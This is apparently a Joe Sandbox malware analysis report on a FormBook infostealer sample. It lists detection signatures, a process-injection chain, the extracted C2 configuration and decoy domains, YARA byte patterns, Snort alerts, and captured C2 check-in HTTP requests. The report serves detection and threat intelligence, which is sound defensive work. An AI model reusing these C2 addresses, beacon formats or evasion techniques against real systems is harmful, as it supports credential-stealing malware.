Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
Analysis ID:810265
MD5:19a7c2a3f614a2f0c25065ed749eff53
SHA1:fba7bde153caa8329cff3e906ea903402e51bc88
SHA256:f8aa17381586d95eb4511d81932e4b53ddf5d3f17f8dc979f509ab94fe7cee64
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe (PID: 1092 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe MD5: 19A7C2A3F614A2F0C25065ED749EFF53)
    • MSBuild.exe (PID: 5884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 2808 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 5908 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 5140 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.fliparcher.store/p25s/"], "decoy": ["krautdialer.com", "jasmine-baba.com", "jdyokum.com", "lingeriepourdames.com", "freefontforest.com", "32612.xyz", "katkisiz.info", "blueskyinteractives.co.uk", "ieruiw.top", "nurfedui.net", "allsttk.com", "tanglwood.net", "gyrationtechs.africa", "tpsplant.africa", "kp-morioka-minami.com", "aiindianapolis.com", "axesslimousine.com", "shopvougs.com", "couldskuathink.com", "aformulaonline.com", "thescopolaminequeen.com", "haberturi.com", "childsqianage.com", "6n1000.com", "iqd964.com", "svtechsoln.com", "havensedgemc.net", "obqj58.net", "desipizza.uk", "artfulprintz.com", "blackhillsbrandingcompany.com", "je-suisla.biz", "pfokn.online", "16235.vip", "definedrealtygroup.com", "kaktyc.ru", "dobrozdrawin3.ru", "iftar.rsvp", "thaichildrenstrust.org.uk", "hastelaundry.com", "anbietertest.com", "furniture-99732.com", "hairbybea.co.uk", "tjhymzz.com", "cyclorga.com", "appatit.com", "afemebel.ru", "hblcfl.com", "envivox.com", "singlesnearyou.co.uk", "asterasweden.com", "singer-dj.co.uk", "itselizabethsmktgmethod.com", "vacacioneschile.net", "associazionefaber.com", "hostim.dev", "dragon-mail.biz", "nonfungible.africa", "cmcl.africa", "vsattorney.africa", "angiesminishop24gmail.com", "wecareer.net", "mojk.net", "adamdavisgroup.com"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries
      SourceRuleDescriptionAuthorStrings
      3.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.MSBuild.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.MSBuild.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 10 entries
          No Sigma rule has matched
          Timestamp:192.168.2.5160.121.126.4449713802031453 02/16/23-23:50:26.920788
          SID:2031453
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5213.171.195.10549711802031449 02/16/23-23:50:01.373956
          SID:2031449
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5160.121.126.4449713802031412 02/16/23-23:50:26.920788
          SID:2031412
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5213.171.195.10549711802031412 02/16/23-23:50:01.373956
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5213.171.195.10549711802031453 02/16/23-23:50:01.373956
          SID:2031453
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5160.121.126.4449713802031449 02/16/23-23:50:26.920788
          SID:2031449
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeReversingLabs: Detection: 15%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeVirustotal: Detection: 36%Perma Link
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.iqd964.com/p25s/Avira URL Cloud: Label: malware
          Source: www.fliparcher.store/p25s/Avira URL Cloud: Label: malware
          Source: http://www.32612.xyz/p25s/Avira URL Cloud: Label: malware
          Source: http://www.jdyokum.com/p25s/Avira URL Cloud: Label: malware
          Source: http://www.fliparcher.store/p25s/www.pfokn.onlineAvira URL Cloud: Label: malware
          Source: http://www.32612.xyz/p25s/www.iqd964.comAvira URL Cloud: Label: malware
          Source: http://www.iqd964.com/p25s/www.allsttk.comAvira URL Cloud: Label: malware
          Source: http://www.adamdavisgroup.com/p25s/Avira URL Cloud: Label: malware
          Source: http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.comAvira URL Cloud: Label: malware
          Source: http://www.fliparcher.store/p25s/Avira URL Cloud: Label: malware
          Source: http://www.pfokn.online/p25s/Avira URL Cloud: Label: malware
          Source: http://www.pfokn.onlineAvira URL Cloud: Label: malware
          Source: http://www.jdyokum.com/p25s/www.iftar.rsvpAvira URL Cloud: Label: malware
          Source: http://www.pfokn.online/p25s/www.katkisiz.infoAvira URL Cloud: Label: malware
          Source: http://www.adamdavisgroup.com/p25s/www.jdyokum.comAvira URL Cloud: Label: malware
          Source: http://www.blueskyinteractives.co.uk/p25s/Avira URL Cloud: Label: malware
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeJoe Sandbox ML: detected
          Source: 3.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fliparcher.store/p25s/"], "decoy": ["krautdialer.com", "jasmine-baba.com", "jdyokum.com", "lingeriepourdames.com", "freefontforest.com", "32612.xyz", "katkisiz.info", "blueskyinteractives.co.uk", "ieruiw.top", "nurfedui.net", "allsttk.com", "tanglwood.net", "gyrationtechs.africa", "tpsplant.africa", "kp-morioka-minami.com", "aiindianapolis.com", "axesslimousine.com", "shopvougs.com", "couldskuathink.com", "aformulaonline.com", "thescopolaminequeen.com", "haberturi.com", "childsqianage.com", "6n1000.com", "iqd964.com", "svtechsoln.com", "havensedgemc.net", "obqj58.net", "desipizza.uk", "artfulprintz.com", "blackhillsbrandingcompany.com", "je-suisla.biz", "pfokn.online", "16235.vip", "definedrealtygroup.com", "kaktyc.ru", "dobrozdrawin3.ru", "iftar.rsvp", "thaichildrenstrust.org.uk", "hastelaundry.com", "anbietertest.com", "furniture-99732.com", "hairbybea.co.uk", "tjhymzz.com", "cyclorga.com", "appatit.com", "afemebel.ru", "hblcfl.com", "envivox.com", "singlesnearyou.co.uk", "asterasweden.com", "singer-dj.co.uk", "itselizabethsmktgmethod.com", "vacacioneschile.net", "associazionefaber.com", "hostim.dev", "dragon-mail.biz", "nonfungible.africa", "cmcl.africa", "vsattorney.africa", "angiesminishop24gmail.com", "wecareer.net", "mojk.net", "adamdavisgroup.com"]}
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop ebx3_2_00407B1B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop esi3_2_00417322

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 156.242.168.70 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.desipizza.uk
          Source: C:\Windows\explorer.exeDomain query: www.hblcfl.com
          Source: C:\Windows\explorer.exeDomain query: www.anbietertest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.140.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: Malware configuration extractorURLs: www.fliparcher.store/p25s/
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.anbietertest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.hblcfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.desipizza.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.couldskuathink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 213.171.195.105 213.171.195.105
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginx/1.14.2Date: Thu, 16 Feb 2023 22:49:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 31 33 0d 0a 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 13Service Unavailable0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 Feb 2023 22:47:33 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 104.77.36.175
          Source: unknownTCP traffic detected without corresponding DNS query: 104.77.36.175
          Source: unknownTCP traffic detected without corresponding DNS query: 178.79.225.0
          Source: unknownTCP traffic detected without corresponding DNS query: 178.79.225.0
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 178.79.225.0
          Source: unknownTCP traffic detected without corresponding DNS query: 178.79.225.0
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.89
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.3
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.42.16
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.32612.xyz
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.32612.xyz/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.32612.xyz/p25s/www.iqd964.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.32612.xyzReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adamdavisgroup.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adamdavisgroup.com/p25s/
